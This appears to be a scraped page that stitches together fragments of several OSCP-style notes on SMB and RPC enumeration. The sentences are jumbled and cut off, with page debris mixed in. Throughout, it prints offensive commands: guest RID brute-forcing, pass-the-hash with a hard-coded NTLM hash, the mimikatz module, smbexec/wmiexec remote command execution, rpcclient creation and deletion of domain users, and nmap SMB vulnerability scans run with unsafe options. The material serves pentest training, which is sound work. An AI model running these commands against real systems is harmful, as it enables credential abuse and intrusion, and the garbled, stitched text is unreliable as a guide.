A Little Guide to SMB Enumeration. Once we have a SID we can enumerate the rest. This group constitutes 7 attributes and 2 users are a member of this group. In this lab, it is assumed that the attacker/operator has gained: The below shows a couple of things. SMB2 Windows Vista SP1 and Windows 2008, crackmapexec -u 'guest' -p '' --shares $ip, crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip, crackmapexec -u 'guest' -p '' --users $ip, crackmapexec smb -u Administrator -p, crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B, crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz, crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip, crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution. Let's see how this works by firstly updating the proxychains config file: {% code-tabs %} Cannot retrieve contributors at this time. SQL Injection & XSS Playground. deldriverex Delete a printer driver with files Two applications start a NetBIOS session when one (the client) sends a command to call another client (the server) over, 139/tcp open netbios-ssn Microsoft Windows netbios-ssn. none Force RPC pipe connections to have no special properties, Lets play with a few options: |_ https://technet.microsoft.com/en-us/library/security/ms06-025.aspx List of SMB versions and corresponding Windows versions: SMB1 Windows 2000, XP and Windows 2003. -A, --authentication-file=FILE Get the credentials from a file result was NT_STATUS_NONE_MAPPED Double pivot works the same, but you create the 2nd ssh tunnel via proxychains and a different dynamic port. SMB allows you to share your resources to other computers over the network, version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version, reduced "chattiness" of SMB1. Curious to see if there are any "guides" out there that delve into SMB . | grep -oP 'UnixSamba. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1000 C$ Disk Default share lsaenumsid Enumerate the LSA SIDS *' # download everything recursively in the wwwroot share to /usr/share/smbmap. If proper privileges are assigned it also possible to delete a user using the rpcclient. enumdataex Enumerate printer data for a key remark: PSC 2170 Series S-1-5-21-1835020781-2383529660-3657267081-500 LEWISFAMILY\Administrator (1) dfsgetinfo Query DFS share info C$ NO ACCESS S-1-5-21-1835020781-2383529660-3657267081-1011 LEWISFAMILY\operator (2) lsaquery Query info policy While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. This is purely my experience with CTFs, Tryhackme, Vulnhub, and Hackthebox prior to enrolling in OSCP. ---- ----------- New Folder (9) D 0 Sun Dec 13 05:26:59 2015 The group information helps the attacker to plan their way to the Administrator or elevated access. | References: This problem is solved using lookupnames whereupon providing username the SID of that particular user can be extracted with ease. After the tunnel is up, you can comment out the first socks entry in proxychains config. A null session is a connection with a samba or SMB server that does not require authentication with a password. Upon running this on the rpcclient shell, it will extract the usernames with their RID. setform Set form | Type: STYPE_DISKTREE_HIDDEN You can indicate which option you prefer to use with the parameter, # Using --exec-method {mmcexec,smbexec,atexec,wmiexec}, via SMB) in the victim machine and use it to, it is located on /usr/share/doc/python3-impacket/examples/, #If no password is provided, it will be prompted, Stealthily execute a command shell without touching the disk or running a new service using DCOM via, #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted, Execute commands via the Task Scheduler (using, https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/, #Get usernames bruteforcing that rids and then try to bruteforce each user name, This attack uses the Responder toolkit to. setdriver Set printer driver rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-502 querygroupmem Query group membership The deletedomuser command is used to perform this action. In the demonstration, it can be observed that lsaenumsid has enumerated 20 SIDs within the Local Security Authority or LSA. With --pw-nt-hash, the pwd provided is the NT hash, #Use --no-pass -c 'recurse;ls' to list recursively with smbclient, #List with smbmap, without folder it list everything. Description. This will help in getting the information such as the kind of password policies that have been enforced by the Administrator in the domain. rpcclient -U "" rpcclient $> querydominfo . The below shows a couple of things. There was a Forced Logging off on the Server and other important information. without the likes of: which most likely are monitored by the blue team. With some input from the NetSecFocus group, Im building out an SMB enumeration check list here. --------------- ---------------------- While having some privileges it is also possible to create a user within the domain using the rpcclient. In this article, we were able to enumerate a wide range of information through the SMB and RPC channel inside a domain using the rpcclient tool. | account_used: guest dsenumdomtrusts Enumerate all trusted domains in an AD forest Dec 2, 2018, PWK Notes: SMB Enumeration Checklist [Updated]. May need to run a second time for success. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004 Flashcards. I create my own checklist for the first but very important step: Enumeration. 4. As from the previous commands, we saw that it is possible to create a user through rpcclient. MSRPC was originally derived from open source software but has been developed further and copyrighted by . Using rpcclient we can enumerate usernames on those OSs just like a windows OS. Port_Number: 137,138,139 #Comma separated if there is more than one. 1690825 blocks of size 2048. RID is a suffix of the long SID in a hexadecimal format. enumkey Enumerate printer keys S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1) rpcclient -U '%' -N <IP> Web-Enum . Where the output of the magic script needs to be stored? Metasploit SMB auxiliary scanners. That narrows the version that the attacker might be looking at to Windows 10, Windows Server 2016, and Windows Server 2019. It is a software protocol that allows applications, PCs, and Desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. (MS)RPC. | VULNERABLE: In the demonstration, the user with RID 0x1f4 was enumerated regarding their password properties. You get the idea, was pretty much the same for the Ubuntu guy cept that his user accounts were -3000. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository. dsroledominfo Get Primary Domain Information Can try without a password (or sending a blank password) and still potentially connect. result was NT_STATUS_NONE_MAPPED 445/tcp open microsoft-ds rewardone in the PWK forums posted a neat script to easily get Samba versions: When you run this on a box running Samba, you get results: When in doubt, we can check the smb version in PCAP. 623/UDP/TCP - IPMI. After that command was run, rpcclient will give you the most excellent "rpcclient> " prompt. After creating the users and changing their passwords, its time to manipulate the groups. dfsadd Add a DFS share | \\[ip]\C$: In this lab, it is assumed that the attacker/operator has gained: code execution on a target system and the beacon is calling back to the team server, to be interrogated by via Microsoft Remote Procedure Call, also known as a function call or a subroutine call, is a protocol that uses the client-server model in order to allow one program to request service from a program on another computer without having to understand the details of that computer's network. Adding it to the original post. --------------- ---------------------- In the demonstration below, the attacker chooses S-1-1-0 SID to enumerate. As with the lsaenumsid, it was possible to extract the SID but it was not possible to tell which user has that SID. OSCP Enumeration Cheat Sheet. In the demonstration, it can be observed that the current user has been allocated 35 privileges. and therefore do not correspond to the rights assigned locally on the server. In the demonstration, it can be observed that a query was generated for LSA which returned with information such as Domain Name and SID. The next command that can be used is enumalsgroups. Enum4linux. *[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &, echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null. netname: ADMIN$ This command helps the attacker enumerate the security objects or permissions and privileges related to the security as demonstrated below. getdataex Get printer driver data with keyname Hydra (http://www.thc.org) starting at 2007-07-27 21:51:46 | State: VULNERABLE Protocol_Name: SMB #Protocol Abbreviation if there is one. queryaliasmem Query alias membership result was NT_STATUS_NONE_MAPPED enumdrivers Enumerate installed printer drivers This will use, as you point out, port 445. Connect to wwwroot share (try blank password), Nmap scans for SMB vulnerabilities (NB: can cause DoS), Enumerate SNMP device (places info in readable format), Enumerate file privileges (see here for discussion of file_priv), Check if current user superuser (on = yes, off = no), Check users privileges over table (pg_shadow). This command can be used to extract the details regarding the user that the SID belongs. Heres an example Unix Samba 2.2.3a: Windows SMB is more complex than just a version, but looking in wireshark will give a bunch of information about the connection. A collection of commands and tools used for conducting enumeration during my OSCP journey. nmap -p 139,445 --open -oG smb.txt, nmap --script smb-enum-shares -p 139,445 $ip, smbclient -L // --option='client min protocol=NT1', # if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED", SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename, SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename, nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip, nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip, nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip, nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip, Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default, Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default. object in the NAME_DOMAIN.LOCAL domain and you will never see this paired value tied to another object in this domain or any other. Further, when the attacker used the same SID as a parameter for lsaenumprivaccount, they were able to enumerate the levels of privileges such as high, low, and attribute. This command retrieves the domain, server, users on the system, and other relevant information. Initial Access. | Type: STYPE_DISKTREE rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1007 S-1-5-21-1835020781-2383529660-3657267081-1001 LEWISFAMILY\wheel (2) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1008 | Type: STYPE_DISKTREE {% code-tabs-item title="attacker@kali" %}. C$ NO ACCESS To enumerate the shares manually you might want to look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME, when using a valid session (e.g. It is possible to perform enumeration regarding the privileges for a group or a user based on their SID as well. List of SMB versions and corresponding Windows versions: SMB1 Windows 2000, XP and Windows 2003. S-1-5-21-1835020781-2383529660-3657267081-1015 LEWISFAMILY\bin (2) It can be used on the rpcclient shell that was generated to enumerate information about the server. rpcclient $> enumprivs SeSecurityPrivilege 0:8 (0x0:0x8) For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. ADMIN$ NO ACCESS It contains contents from other blogs for my quick reference getdata Get print driver data D 0 Thu Sep 27 16:26:00 2018 Copyright 2017 pentest.tonyng.net. SaPrintOp 0:65283 (0x0:0xff03). sign Force RPC pipe connections to be signed great when smbclient doesnt work --------------- ---------------------- schannelsign Force RPC pipe connections to be signed (not sealed) with 'schannel' (NETSEC). This information includes the Group Name, Description, Attributes, and the number of members in that group. enumdata Enumerate printer data rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-501 Thus it might be worth a short to try to manually connect to a share. The TTL drops 1 each time it passes through a router. After creating the group, it is possible to see the newly created group using the enumdomgroup command. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2004 Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: Moving on, same way, they can query info about specific AD users: Enumerate current user's privileges and many more (consult rpcclient for all available commands): Finally, of course they can run nmap if needed: Impacket provides even more tools to enumerate remote systems through compromised boxes. WORKGROUP <1e> - M To do this first, the attacker needs a SID. Defense Evasion. . lsaaddacctrights Add rights to an account [+] IP: [ip]:445 Name: [ip] PORT STATE SERVICE | State: VULNERABLE Code & Process Injection. Reconnecting with SMB1 for workgroup listing. Replication READ ONLY SecureAuthCorp/impacket, https://www.cobaltstrike.com/help-socks-proxy-pivoting. LSARPC-DS ECHO quit Exit program list List available commands on During our previous demonstrations, we were able to enumerate the permissions and privileges of users and groups based on the RID of that particular user. This tool is part of the samba(7) suite. null session or valid credentials). guest S-1-5-21-1835020781-2383529660-3657267081-1063 (Local Group: 4) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1010
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